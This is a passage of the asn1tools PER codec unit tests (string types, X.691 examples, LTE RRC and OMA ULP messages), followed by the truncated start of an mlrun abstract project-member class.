('E', {'a': True, 'b': '12'}, b'\x98\x99\x00'),
('F', {'a': True, 'b': '123'}, b'\x80\x31\x32\x33'),
('G', {'a': True, 'b': '1'}, b'\xcc\x40'),
('H', {'a': True, 'b': '1'}, b'\xa0\x31'),
('I', 'hej', b'\x02\x68\x65\x6a'),
('J', 'a', b'\x01'),
('K', 'a', b'\x01')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
# Bad character 0x19 should raise an exception.
with self.assertRaises(asn1tools.EncodeError) as cm:
foo.encode('A', '\x19', check_constraints=False)
self.assertEqual(
str(cm.exception),
"A: Expected a character in ' !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEF"
"GHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~', but got"
" '.' (0x19)'.")
def test_general_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= GeneralString "
"B ::= SEQUENCE { "
" a BOOLEAN, "
" b GeneralString "
"} "
"END",
'per')
datas = [
('A', '', b'\x00'),
('A', '2', b'\x01\x32'),
('B', {'a': False, 'b': u'K'}, b'\x00\x01\x4b')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_bmp_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= BMPString "
"B ::= SEQUENCE { "
" a BOOLEAN, "
" b BMPString "
"} "
"C ::= SEQUENCE { "
" a BMPString (SIZE(1..128)), "
" b BMPString (SIZE(1..256)) "
"} "
"END",
'per')
datas = [
('A', '', b'\x00'),
('A', '123', b'\x03\x00\x31\x00\x32\x00\x33'),
('B', {'a': False, 'b': u'K'}, b'\x00\x01\x00\x4b'),
('C',
{'a': '123', 'b': '123'},
b'\x04\x001\x002\x003\x02\x001\x002\x003')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
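        # UTF-16 surrogate code points (0xD800-0xDFFF) are not valid
        # BMPString characters and are rejected when decoding.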
with self.assertRaises(asn1tools.DecodeError) as cm:
foo.decode('A', b'\x01\xd8\x00')
valid_chars = [v for v in range(65536) if v < 0xd800 or v > 0xdfff]
self.assertEqual(str(cm.exception),
"A: Expected a value in %s, but got %d." % (valid_chars,
0xd800,))
def test_graphic_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= GraphicString "
"B ::= SEQUENCE { "
" a BOOLEAN, "
" b GraphicString "
"} "
"END",
'per')
datas = [
('A', '', b'\x00'),
('A', '2', b'\x01\x32'),
('B', {'a': False, 'b': u'K'}, b'\x00\x01\x4b')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_teletex_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= TeletexString "
"B ::= SEQUENCE { "
" a BOOLEAN, "
" b TeletexString "
"} "
"END",
'per')
datas = [
('A', u'123', b'\x03\x31\x32\x33'),
('B', {'a': False, 'b': u'K'}, b'\x00\x01\x4b')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_universal_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= UniversalString "
"B ::= SEQUENCE { "
" a BOOLEAN, "
" b UniversalString "
"} "
"END",
'per')
datas = [
('A',
u'åäö',
b'\x03\x00\x00\x00\xe5\x00\x00\x00\xe4\x00\x00\x00\xf6'),
('A',
u'1Q',
b'\x03\x00\x00\x00\x31\x00\x01\x02\x03\x00\x00\x00\x51'),
('B', {'a': False, 'b': u'K'}, b'\x00\x01\x00\x00\x00\x4b')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_foo(self):
foo = asn1tools.compile_files('tests/files/foo.asn', 'per')
self.assertEqual(len(foo.types), 2)
self.assertTrue(foo.types['Question'] is not None)
self.assertTrue(foo.types['Answer'] is not None)
self.assertEqual(len(foo.modules), 1)
self.assertTrue(foo.modules['Foo'] is not None)
# Encode a question.
encoded = foo.encode('Question',
{'id': 1, 'question': 'Is 1+1=3?'})
self.assertEqual(encoded,
b'\x01\x01\x09\x49\x73\x20\x31\x2b\x31\x3d\x33\x3f')
# Decode the encoded question.
decoded = foo.decode('Question', encoded)
self.assertEqual(decoded, {'id': 1, 'question': 'Is 1+1=3?'})
# Encode an answer.
encoded = foo.encode('Answer', {'id': 1, 'answer': False})
self.assertEqual(encoded, b'\x01\x01\x00')
# Decode the encoded answer.
decoded = foo.decode('Answer', encoded)
self.assertEqual(decoded, {'id': 1, 'answer': False})
def test_decode_length(self):
foo = asn1tools.compile_files('tests/files/foo.asn', 'per')
with self.assertRaises(asn1tools.DecodeError) as cm:
foo.decode_length(b'')
self.assertEqual(str(cm.exception),
'Decode length is not supported for this codec.')
def test_versions(self):
foo = asn1tools.compile_files('tests/files/versions.asn', 'per')
# Encode as V1, decode as V1, V2 and V3
decoded_v1 = {
'userName': 'myUserName',
'password': 'myPassword',
'accountNumber': 54224445
}
encoded_v1 = foo.encode('V1', decoded_v1)
self.assertEqual(foo.decode('V1', encoded_v1), decoded_v1)
self.assertEqual(foo.decode('V2', encoded_v1), decoded_v1)
self.assertEqual(foo.decode('V3', encoded_v1), decoded_v1)
# Encode as V2, decode as V1, V2 and V3
decoded_v2 = {
'userName': 'myUserName',
'password': 'myPassword',
'accountNumber': 54224445,
'minutesLastLoggedIn': 5
}
encoded_v2 = foo.encode('V2', decoded_v2)
self.assertEqual(foo.decode('V1', encoded_v2), decoded_v1)
self.assertEqual(foo.decode('V2', encoded_v2), decoded_v2)
self.assertEqual(foo.decode('V3', encoded_v2), decoded_v2)
# Encode as V3, decode as V1, V2 and V3
decoded_v3 = {
'userName': 'myUserName',
'password': 'myPassword',
'accountNumber': 54224445,
'minutesLastLoggedIn': 5,
'certificate': None,
'thumb': None
}
encoded_v3 = foo.encode('V3', decoded_v3)
self.assertEqual(foo.decode('V1', encoded_v3), decoded_v1)
self.assertEqual(foo.decode('V2', encoded_v3), decoded_v2)
self.assertEqual(foo.decode('V3', encoded_v3), decoded_v3)
def test_x691_a1(self):
a1 = asn1tools.compile_files('tests/files/x691_a1.asn', 'per')
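        # This mirrors the PersonnelRecord example from ITU-T X.691,
        # Annex A.1 (aligned PER).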
decoded = {
'name': {
'givenName': 'John',
'initial': 'P',
'familyName': 'Smith'
},
'title': 'Director',
'number': 51,
'dateOfHire': '19710917',
'nameOfSpouse': {
'givenName': 'Mary',
'initial': 'T',
'familyName': 'Smith'
},
'children': [
{
'name': {
'givenName': 'Ralph',
'initial': 'T',
'familyName': 'Smith'
},
'dateOfBirth': '19571111'
},
{
'name': {
'givenName': 'Susan',
'initial': 'B',
'familyName': 'Jones'
},
'dateOfBirth': '19590717'
}
]
}
encoded = (
b'\x80\x04\x4a\x6f\x68\x6e\x01\x50\x05\x53\x6d\x69\x74\x68\x01\x33'
b'\x08\x44\x69\x72\x65\x63\x74\x6f\x72\x08\x31\x39\x37\x31\x30\x39'
b'\x31\x37\x04\x4d\x61\x72\x79\x01\x54\x05\x53\x6d\x69\x74\x68\x02'
b'\x05\x52\x61\x6c\x70\x68\x01\x54\x05\x53\x6d\x69\x74\x68\x08\x31'
b'\x39\x35\x37\x31\x31\x31\x31\x05\x53\x75\x73\x61\x6e\x01\x42\x05'
b'\x4a\x6f\x6e\x65\x73\x08\x31\x39\x35\x39\x30\x37\x31\x37'
)
self.assert_encode_decode(a1, 'PersonnelRecord', decoded, encoded)
def test_x691_a2(self):
a2 = asn1tools.compile_files('tests/files/x691_a2.asn', 'per')
decoded = {
'name': {
'givenName': 'John',
'initial': 'P',
'familyName': 'Smith'
},
'title': 'Director',
'number': 51,
'dateOfHire': '19710917',
'nameOfSpouse': {
'givenName': 'Mary',
'initial': 'T',
'familyName': 'Smith'
},
'children': [
{
'name': {
'givenName': 'Ralph',
'initial': 'T',
'familyName': 'Smith'
},
'dateOfBirth': '19571111'
},
{
'name': {
'givenName': 'Susan',
'initial': 'B',
'familyName': 'Jones'
},
'dateOfBirth': '19590717'
}
]
}
encoded = (
b'\x86\x4a\x6f\x68\x6e\x50\x10\x53\x6d\x69\x74\x68\x01\x33\x08\x44'
b'\x69\x72\x65\x63\x74\x6f\x72\x19\x71\x09\x17\x0c\x4d\x61\x72\x79'
b'\x54\x10\x53\x6d\x69\x74\x68\x02\x10\x52\x61\x6c\x70\x68\x54\x10'
b'\x53\x6d\x69\x74\x68\x19\x57\x11\x11\x10\x53\x75\x73\x61\x6e\x42'
b'\x10\x4a\x6f\x6e\x65\x73\x19\x59\x07\x17'
)
self.assert_encode_decode(a2, 'PersonnelRecord', decoded, encoded)
def test_x691_a3(self):
a3 = asn1tools.compile_files('tests/files/x691_a3.asn', 'per')
decoded = {
'name': {
'givenName': 'John',
'initial': 'P',
'familyName': 'Smith'
},
'title': 'Director',
'number': 51,
'dateOfHire': '19710917',
'nameOfSpouse': {
'givenName': 'Mary',
'initial': 'T',
'familyName': 'Smith'
},
'children': [
{
'name': {
'givenName': 'Ralph',
'initial': 'T',
'familyName': 'Smith'
},
'dateOfBirth': '19571111'
},
{
'name': {
'givenName': 'Susan',
'initial': 'B',
'familyName': 'Jones'
},
'dateOfBirth': '19590717',
'sex': 'female'
}
]
}
encoded = (
b'\x40\xc0\x4a\x6f\x68\x6e\x50\x08\x53\x6d\x69\x74\x68\x00\x00\x33'
b'\x08\x44\x69\x72\x65\x63\x74\x6f\x72\x00\x19\x71\x09\x17\x03\x4d'
b'\x61\x72\x79\x54\x08\x53\x6d\x69\x74\x68\x01\x00\x52\x61\x6c\x70'
b'\x68\x54\x08\x53\x6d\x69\x74\x68\x00\x19\x57\x11\x11\x82\x00\x53'
b'\x75\x73\x61\x6e\x42\x08\x4a\x6f\x6e\x65\x73\x00\x19\x59\x07\x17'
b'\x01\x01\x40'
)
self.assert_encode_decode(a3, 'PersonnelRecord', decoded, encoded)
def test_x691_a4(self):
a4 = asn1tools.compile_dict(deepcopy(X691_A4), 'per')
decoded = {
'a': 253,
'b': True,
'c': ('e', True),
'g': '123',
'h': True
}
encoded = (
b'\x9e\x00\x01\x80\x01\x02\x91\xa4'
)
self.assert_encode_decode(a4, 'Ax', decoded, encoded)
def test_rrc_8_6_0(self):
rrc = asn1tools.compile_dict(deepcopy(RRC_8_6_0), 'per')
# Message 1.
decoded = {
'message': (
'c1',
(
'paging',
{
'systemInfoModification': 'true',
'nonCriticalExtension': {
}
}
)
)
}
encoded = b'\x28'
self.assert_encode_decode(rrc, 'PCCH-Message', decoded, encoded)
# Message 2.
decoded = {
'message': (
'c1',
(
'paging', {
}
)
)
}
encoded = b'\x00'
self.assert_encode_decode(rrc, 'PCCH-Message', decoded, encoded)
# Message 3.
decoded = {
'message': {
'dl-Bandwidth': 'n6',
'phich-Config': {
'phich-Duration': 'normal',
'phich-Resource': 'half'
},
'systemFrameNumber': (b'\x12', 8),
'spare': (b'\x34\x40', 10)
}
}
encoded = b'\x04\x48\xd1'
self.assert_encode_decode(rrc, 'BCCH-BCH-Message', decoded, encoded)
# Message #4.
decoded = {
'message': (
'c1',
(
'systemInformation',
{
'criticalExtensions': (
'systemInformation-r8',
{
'sib-TypeAndInfo': [
(
'sib2',
{
'ac-BarringInfo': {
'ac-BarringForEmergency': True,
'ac-BarringForMO-Data': {
'ac-BarringFactor': 'p95',
'ac-BarringTime': 's128',
'ac-BarringForSpecialAC': (b'\xf0', 5)
}
},
'radioResourceConfigCommon': {
'rach-ConfigCommon': {
'preambleInfo': {
'numberOfRA-Preambles': 'n24',
'preamblesGroupAConfig': {
'sizeOfRA-PreamblesGroupA': 'n28',
'messageSizeGroupA': 'b144',
'messagePowerOffsetGroupB': 'minusinfinity'
}
},
'powerRampingParameters': {
'powerRampingStep': 'dB0',
'preambleInitialReceivedTargetPower': 'dBm-102'
},
'ra-SupervisionInfo': {
'preambleTransMax': 'n8',
'ra-ResponseWindowSize': 'sf6',
'mac-ContentionResolutionTimer': 'sf48'
},
'maxHARQ-Msg3Tx': 8
},
'bcch-Config': {
'modificationPeriodCoeff': 'n2'
},
'pcch-Config': {
'defaultPagingCycle': 'rf256',
'nB': 'twoT'
},
'prach-Config': {
'rootSequenceIndex': 836,
'prach-ConfigInfo': {
'prach-ConfigIndex': 33,
'highSpeedFlag': False,
'zeroCorrelationZoneConfig': 10,
'prach-FreqOffset': 64
}
},
'pdsch-ConfigCommon': {
'referenceSignalPower': -60,
'p-b': 2
},
'pusch-ConfigCommon': {
'pusch-ConfigBasic': {
'n-SB': 1,
'hoppingMode': 'interSubFrame',
'pusch-HoppingOffset': 10,
'enable64QAM': False
},
'ul-ReferenceSignalsPUSCH': {
'groupHoppingEnabled': True,
'groupAssignmentPUSCH': 22,
'sequenceHoppingEnabled': False,
'cyclicShift': 5
}
},
'pucch-ConfigCommon': {
'deltaPUCCH-Shift': 'ds1',
'nRB-CQI': 98,
'nCS-AN': 4,
'n1PUCCH-AN': 2047
},
'soundingRS-UL-ConfigCommon': (
'setup',
{
'srs-BandwidthConfig': 'bw0',
'srs-SubframeConfig': 'sc4',
'ackNackSRS-SimultaneousTransmission': True
}),
'uplinkPowerControlCommon': {
'p0-NominalPUSCH': -126,
'alpha': 'al0',
'p0-NominalPUCCH': -127,
'deltaFList-PUCCH': {
'deltaF-PUCCH-Format1': 'deltaF-2',
'deltaF-PUCCH-Format1b': 'deltaF1',
'deltaF-PUCCH-Format2': 'deltaF0',
'deltaF-PUCCH-Format2a': 'deltaF-2',
'deltaF-PUCCH-Format2b': 'deltaF0'
},
'deltaPreambleMsg3': -1
},
'ul-CyclicPrefixLength': 'len1'
},
'ue-TimersAndConstants': {
't300': 'ms100',
't301': 'ms200',
't310': 'ms50',
'n310': 'n2',
't311': 'ms30000',
'n311': 'n2'
},
'freqInfo': {
'additionalSpectrumEmission': 3
},
'timeAlignmentTimerCommon': 'sf500'
}
),
(
'sib3',
{
'cellReselectionInfoCommon': {
'q-Hyst': 'dB0',
'speedStateReselectionPars': {
'mobilityStateParameters': {
't-Evaluation': 's180',
't-HystNormal': 's180',
'n-CellChangeMedium': 1,
'n-CellChangeHigh': 16
},
'q-HystSF': {
'sf-Medium': 'dB-6',
'sf-High': 'dB-4'
}
}
},
'cellReselectionServingFreqInfo': {
'threshServingLow': 7,
'cellReselectionPriority': 3
},
'intraFreqCellReselectionInfo': {
'q-RxLevMin': -33,
's-IntraSearch': 0,
'presenceAntennaPort1': False,
'neighCellConfig': (b'\x80', 2),
't-ReselectionEUTRA': 4
}
}
),
(
'sib4',
{
}
),
(
'sib5',
{
'interFreqCarrierFreqList': [
{
'dl-CarrierFreq': 1,
'q-RxLevMin': -45,
't-ReselectionEUTRA': 0,
'threshX-High': 31,
'threshX-Low': 29,
'allowedMeasBandwidth': 'mbw6',
'presenceAntennaPort1': True,
'neighCellConfig': (b'\x00', 2),
'q-OffsetFreq': 'dB0'
}
]
}
),
(
'sib6',
{
't-ReselectionUTRA': 3
}
),
(
'sib7',
{
't-ReselectionGERAN': 3
}
),
(
'sib8',
{
'parameters1XRTT': {
'longCodeState1XRTT': (b'\x01\x23\x45\x67\x89\x00', 42)
}
}
),
(
'sib9',
{
'hnb-Name': b'4'
}
),
(
'sib10',
{
'messageIdentifier': (b'#4', 16),
'serialNumber': (b'\x124', 16),
'warningType': b'2\x12'
}
),
(
'sib11',
{
'messageIdentifier': (b'g\x88', 16),
'serialNumber': (b'T5', 16),
'warningMessageSegmentType': 'notLastSegment',
'warningMessageSegmentNumber': 19,
'warningMessageSegment': b'\x12'
}
)
]
}
)
}
)
)
}
encoded = (
b'\x04\x81\x3f\xbe\x2a\x64\x12\xb2\xf3\x20\x03\x44\x85\x50\x00\x40'
b'\x53\x65\x31\x40\x07\xff\x82\x40\x00\x01\x10\x02\x4e\x20\x80\x50'
b'\x6c\x3c\x47\x69\x28\x14\x10\x0c\x00\x00\x00\x01\x64\x7f\xa2\x10'
b'\x19\x43\x30\x50\x01\x23\x45\x67\x89\x0e\x80\x34\x40\x46\x68\x24'
b'\x68\x64\x24\x91\x9e\x21\x50\xd4\x98\x01\x12'
)
self.assert_encode_decode(rrc, 'BCCH-DL-SCH-Message', decoded, encoded)
def test_all_types_automatic_tags(self):
all_types = asn1tools.compile_files(
'tests/files/all_types_automatic_tags.asn', 'per')
datas = [
            ('Sequence3', {'a': 1, 'c': 2, 'd': True}, b'\x00\x01\x01\x01\x02\x80')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(all_types, type_name, decoded, encoded)
def test_bar(self):
"""A simple example.
"""
bar = asn1tools.compile_files('tests/files/bar.asn', 'per')
# Message 1.
decoded = {
'headerOnly': True,
'lock': False,
'acceptTypes': {
'standardTypes': [(b'\x40', 2), (b'\x80', 1)]
},
'url': b'/ses/magic/moxen.html'
}
encoded = (
b'\xd0\x02\x02\x40\x01\x80\x15\x2f\x73\x65\x73\x2f\x6d\x61\x67\x69'
b'\x63\x2f\x6d\x6f\x78\x65\x6e\x2e\x68\x74\x6d\x6c'
)
self.assert_encode_decode(bar, 'GetRequest', decoded, encoded)
# Message 2.
decoded = {
'headerOnly': False,
'lock': False,
'url': b'0'
}
encoded = b'\x00\x01\x30'
self.assert_encode_decode(bar, 'GetRequest', decoded, encoded)
def test_repr_all_types(self):
all_types = asn1tools.compile_files('tests/files/all_types.asn',
'per')
self.assertEqual(repr(all_types.types['Boolean']), 'Boolean(Boolean)')
self.assertEqual(repr(all_types.types['Integer']), 'Integer(Integer)')
self.assertEqual(repr(all_types.types['Bitstring']), 'BitString(Bitstring)')
self.assertEqual(repr(all_types.types['Octetstring']),
'OctetString(Octetstring)')
self.assertEqual(repr(all_types.types['Null']), 'Null(Null)')
self.assertEqual(repr(all_types.types['Objectidentifier']),
'ObjectIdentifier(Objectidentifier)')
self.assertEqual(repr(all_types.types['Enumerated']),
'Enumerated(Enumerated)')
self.assertEqual(repr(all_types.types['Utf8string']),
'UTF8String(Utf8string)')
self.assertEqual(repr(all_types.types['Sequence']), 'Sequence(Sequence, [])')
self.assertEqual(repr(all_types.types['Set']), 'Set(Set, [])')
self.assertEqual(repr(all_types.types['Sequence2']),
'Sequence(Sequence2, [Integer(a)])')
self.assertEqual(repr(all_types.types['Set2']), 'Set(Set2, [Integer(a)])')
self.assertEqual(repr(all_types.types['Numericstring']),
'NumericString(Numericstring)')
self.assertEqual(repr(all_types.types['Printablestring']),
'PrintableString(Printablestring)')
self.assertEqual(repr(all_types.types['Ia5string']), 'IA5String(Ia5string)')
self.assertEqual(repr(all_types.types['Universalstring']),
'UniversalString(Universalstring)')
self.assertEqual(repr(all_types.types['Visiblestring']),
'VisibleString(Visiblestring)')
self.assertEqual(repr(all_types.types['Generalstring']),
'GeneralString(Generalstring)')
self.assertEqual(repr(all_types.types['Bmpstring']),
'BMPString(Bmpstring)')
self.assertEqual(repr(all_types.types['Teletexstring']),
'TeletexString(Teletexstring)')
self.assertEqual(repr(all_types.types['Graphicstring']),
'GraphicString(Graphicstring)')
self.assertEqual(repr(all_types.types['Utctime']), 'UTCTime(Utctime)')
self.assertEqual(repr(all_types.types['SequenceOf']),
'SequenceOf(SequenceOf, Integer())')
self.assertEqual(repr(all_types.types['SetOf']), 'SetOf(SetOf, Integer())')
self.assertEqual(repr(all_types.types['Choice']), "Choice(Choice, ['a'])")
self.assertEqual(repr(all_types.types['Any']), 'Any(Any)')
self.assertEqual(repr(all_types.types['Sequence12']),
'Sequence(Sequence12, [SequenceOf(a, Recursive(Sequence12))])')
def test_s1ap_14_4_0(self):
# ToDo: Do not skip!
return
with self.assertRaises(asn1tools.CompileError):
s1ap = asn1tools.compile_dict(deepcopy(S1AP_14_4_0), 'per')
# Message 1.
decoded_message = (
'successfulOutcome',
{
'procedureCode': 17,
'criticality': 'reject',
'value': {
'protocolIEs': [
{
'id': 105,
'criticality': 'reject',
'value': [
{
'servedPLMNs': [
b'\xab\xcd\xef',
b'\x12\x34\x56'
],
'servedGroupIDs': [
b'\x22\x22'
],
'servedMMECs': [
b'\x11'
]
}
]
}
]
}
}
)
encoded_message = (
b'\x20\x11\x00\x15\x00\x00\x01\x00\x69\x00\x0e\x00\x40\xab\xcd\xef'
b'\x12\x34\x56\x00\x00\x22\x22\x00\x11'
)
encoded = s1ap.encode('S1AP-PDU', decoded_message)
self.assertEqual(encoded, encoded_message)
def test_information_object(self):
# ToDo: Fix when supported.
return
information_object = asn1tools.compile_files(
'tests/files/information_object.asn', 'per')
# Message 1 - without constraints.
decoded_message = {
'id': 0,
'value': b'\x05',
'comment': 'item 0',
'extra': 2
}
encoded_message = (
b'\x01\x00\x01\x05\x06\x69\x74\x65\x6d\x20\x30\x01\x02'
)
self.assert_encode_decode(information_object,
'ItemWithoutConstraints',
decoded_message,
encoded_message)
# Message 1 - with constraints.
decoded_message = {
'id': 0,
'value': True,
'comment': 'item 0',
'extra': 2
}
encoded_message = (
b'\x01\x00\x01\x80\x06\x69\x74\x65\x6d\x20\x30\x01\x02'
)
# ToDo: Constraints are not yet implemented.
with self.assertRaises(TypeError) as cm:
self.assert_encode_decode(information_object,
'ItemWithConstraints',
decoded_message,
encoded_message)
self.assertEqual(str(cm.exception), "object of type 'bool' has no len()")
# Message 2.
decoded_message = {
'id': 1,
'value': {
'myValue': 7,
'myType': 0
},
'comment': 'item 1',
'extra': 5
}
encoded_message = (
b'\x01\x01\x05\x02\x01\x07\x01\x00\x06\x69\x74\x65\x6d\x20\x31\x01'
b'\x05'
)
# ToDo: Constraints are not yet implemented.
with self.assertRaises(TypeError):
self.assert_encode_decode(information_object,
'ItemWithConstraints',
decoded_message,
encoded_message)
# Message 3 - error class.
decoded_message = {
'errorCategory': 'A',
'errors': [
{
'errorCode': 1,
'errorInfo': 3
},
{
'errorCode': 2,
'errorInfo': True
}
]
}
encoded_message = (
b'\x41\x02\x01\x01\x02\x01\x03\x01\x02\x01\x80'
)
# ToDo: Constraints are not yet implemented.
with self.assertRaises(TypeError):
self.assert_encode_decode(information_object,
'ErrorReturn',
decoded_message,
encoded_message)
# Message 4 - C.
decoded_message = {
'a': 0
}
encoded_message = (
b'\x00\x01\x00'
)
encoded = information_object.encode('C', decoded_message)
self.assertEqual(encoded, encoded_message)
# Message 5 - C.
decoded_message = {
'a': 0,
'b': {
'a': 0
}
}
encoded_message = (
b'\x80\x01\x00\x03\x00\x01\x00'
)
with self.assertRaises(TypeError):
encoded = information_object.encode('C', decoded_message)
self.assertEqual(encoded, encoded_message)
# Message 6 - C.
decoded_message = {
'a': 0,
'b': {
'a': 0,
'b': {
'a': 0,
'b': {
'a': 0
}
}
}
}
encoded_message = (
b'\x80\x01\x00\x0b\x80\x01\x00\x07\x80\x01\x00\x03\x00\x01\x00'
)
with self.assertRaises(TypeError):
encoded = information_object.encode('C', decoded_message)
self.assertEqual(encoded, encoded_message)
def test_oma_ulp(self):
ulp = asn1tools.compile_dict(deepcopy(OMA_ULP), 'per')
decoded = {
'length': 162,
'version': {'maj': 2, 'min': 0, 'servind': 0},
'sessionID': {
'setSessionID': {
'sessionId': 8838,
'setId': ('imsi', b'\x64\x00\x00\x00\x00\x00\x20\xf2')
},
'slpSessionID': {
'sessionID': b'\x00\x00\x40\x00',
'slpId': ('iPAddress', ('ipv4Address', b'\x7f\x00\x00\x01'))
}
},
'message': (
'msSUPLPOSINIT', {
'sETCapabilities': {
'posTechnology': {
'agpsSETassisted': True,
'agpsSETBased': True,
'autonomousGPS': False,
'aFLT': False,
'eCID': True,
'eOTD': False,
'oTDOA': True,
'ver2-PosTechnology-extension': {
'gANSSPositionMethods': [
{
'ganssId': 4,
'gANSSPositioningMethodTypes': {
'setAssisted': True,
'setBased': True,
'autonomous': True
},
'gANSSSignals': (b'\x80', 1)
}
]
}
},
'prefMethod': 'noPreference',
'posProtocol': {
'tia801': False,
'rrlp': False,
'rrc': False,
'ver2-PosProtocol-extension': {
'lpp': True,
'posProtocolVersionLPP': {
'majorVersionField': 12,
'technicalVersionField': 4,
'editorialVersionField': 0
}
}
}
},
'locationId': {
'cellInfo': (
'ver2-CellInfo-extension', (
'lteCell',
{
'cellGlobalIdEUTRA': {
'plmn-Identity': {
'mcc': [3, 1, 0],
'mnc': [3, 1, 0]
},
'cellIdentity': (b'\x34\xa3\x20\x20', 28)
},
'physCellId': 304,
'trackingAreaCode': (b'\x13\x8e', 16),
'rsrpResult': 59,
'rsrqResult': 24,
'tA': 1,
'measResultListEUTRA': [
{
'physCellId': 275,
'measResult': {
'rsrpResult': 45,
'rsrqResult': 14
}
},
{
'physCellId': 200,
'measResult': {
'rsrpResult': 39,
'rsrqResult': 8
}
}
]
}
)
),
'status': 'current'
},
'sUPLPOS': {
'posPayLoad': (
'ver2-PosPayLoad-extension',
{
'lPPPayload': [
b'\x92\x2b\x08\x31\xe2\x00\x5d\x00\x82\x17'
b'\x40\x27\x04\x88\x22\x1b\x80\x00\x2d\xe4'
b'\x00\x00\x41\x88\x3c\x09\x24\x30\x44\x18'
b'\xb3\x18\x66\x8f\xc0\x03\x24\x01\x01',
b'\x92\x2c\x10\x62\x62\x13\x10\x34\xa3\x20'
b'\x26\xa4\x01\x40\x84\x00\x00\x00\x00\x01'
b'\x41\x20\x02\x00\x00\x00\x00'
]
}
)
},
'ver': (b'\x52\x88\xec\xab\xa9\x37\x5c\x4e', 64)
}
)
}
encoded = (
b'\x00\xa2\x02\x00\x00\xc0\x22\x86\x30\x64\x00\x00\x00\x00\x00'
b'\x20\xf2\x00\x00\x40\x00\x00\x7f\x00\x00\x01\x31\xb9\x40\x40'
b'\x04\x40\x47\x00\x80\xa0\x04\x04\x0c\x0c\x04\x00\x40\x00\x1b'
b'\x27\xa6\x21\x31\x00\x34\xa3\x20\x20\x01\x30\x13\x8e\x76\xc0'
b'\x00\x01\x20\x01\x13\x6b\x4e\x00\x00\xc8\x69\xc8\x24\x00\x47'
b'\x48\x00\x26\x92\x2b\x08\x31\xe2\x00\x5d\x00\x82\x17\x40\x27'
b'\x04\x88\x22\x1b\x80\x00\x2d\xe4\x00\x00\x41\x88\x3c\x09\x24'
b'\x30\x44\x18\xb3\x18\x66\x8f\xc0\x03\x24\x01\x01\x00\x1a\x92'
b'\x2c\x10\x62\x62\x13\x10\x34\xa3\x20\x26\xa4\x01\x40\x84\x00'
b'\x00\x00\x00\x01\x41\x20\x02\x00\x00\x00\x00\x52\x88\xec\xab'
b'\xa9\x37\x5c\x4e'
)
self.assert_encode_decode(ulp, 'ULP-PDU', decoded, encoded)
def test_not_support_decode_with_length(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= OCTET STRING "
"END",
'oer')
with self.assertRaises(NotImplementedError) as cm:
foo.decode_with_length('A', b'\x01\x23\x45\x67\x89\xab\xcd\xef')
self.assertEqual(str(cm.exception), "This codec does not support decode_with_length().")
if __name__ == '__main__':
unittest.main()
|
import abc
import typing
import sqlalchemy.orm
import mlrun.api.db.session
import mlrun.api.schemas
import mlrun.utils.singleton
from mlrun.utils import logger
class Member(abc.ABC):
@abc.abstractmethod
def initialize(self):
pass
@abc.abstractmethod
def shutdown(self):
pass
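    # The only concrete method: create the project through the leader only if
    # it is not already listed; returns True when a project was created.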
def ensure_project(
self,
db_session: sqlalchemy.orm.Session,
name: str,
wait_for_completion: bool = True,
auth_info: mlrun.api.schemas.AuthInfo = mlrun.api.schemas.AuthInfo(),
) -> bool:
project_names = self.list_projects(
db_session,
format_=mlrun.api.schemas.ProjectsFormat.name_only,
leader_session=auth_info.session,
)
if name in project_names.projects:
return False
logger.info(
"Ensure project called, but project does not exist. Creating", name=name
)
project = mlrun.api.schemas.Project(
metadata=mlrun.api.schemas.ProjectMetadata(name=name),
)
self.create_project(
db_session,
project,
leader_session=auth_info.session,
wait_for_completion=wait_for_completion,
)
return True
@abc.abstractmethod
def create_project(
self,
db_session: sqlalchemy.orm.Session,
project: mlrun.api.schemas.Project,
projects_role: typing.Optional[mlrun.api.schemas.ProjectsRole] = None,
leader_session: typing.Optional[str] = None,
wait_for_completion: bool = True,
) -> typing.Tuple[mlrun.api.schemas.Project, bool]:
pass
@abc.abstractmethod
def store_project(
self,
db_session: sqlalchemy.orm.Session,
name: str,
project: mlrun.api.schemas.Project,
projects_role: typing.Optional[mlrun.api.schemas.ProjectsRole] = None,
leader_session: typing.Optional[str] = None,
wait_for_completion: bool = True,
) -> typing.Tuple[mlrun.api.schemas.Project, bool]:
pass
@abc.abstractmethod
def patch_project(
self,
db_session: sqlalchemy.orm.Session,
name: str,
project: dict,
patch_mode: mlrun.api.schemas.PatchMode = mlrun.api.schemas.PatchMode.replace,
projects_role: typing.Optional[mlrun.api.schemas.ProjectsRole] = None,
leader_session: typing.Optional[str] = None,
wait_for_completion: bool = True,
) -> typing.Tuple[mlrun.api.schemas.Project, bool]:
pass
@abc.abstractmethod
def delete_project(
self,
db_session: sqlalchemy.orm.Session,
name: str,
deletion_strategy: mlrun.api.schemas.DeletionStrategy = mlrun.api.schemas.DeletionStrategy.default(),
projects_role: typing.Optional[mlrun.api.schemas.ProjectsRole] = None,
auth_info: mlrun.api.schemas.AuthInfo = mlrun.api.schemas.AuthInfo(),
wait_for_completion: bool = True,
) -> bool:
pass
@abc.abstractmethod
def get_project(
self,
db_session: sqlalchemy.orm.Session,
name: str,
leader_session: typing.Optional[str] = None,
) -> mlrun.api.schemas.Project:
pass
@abc.abstractmethod
def list_projects(
self,
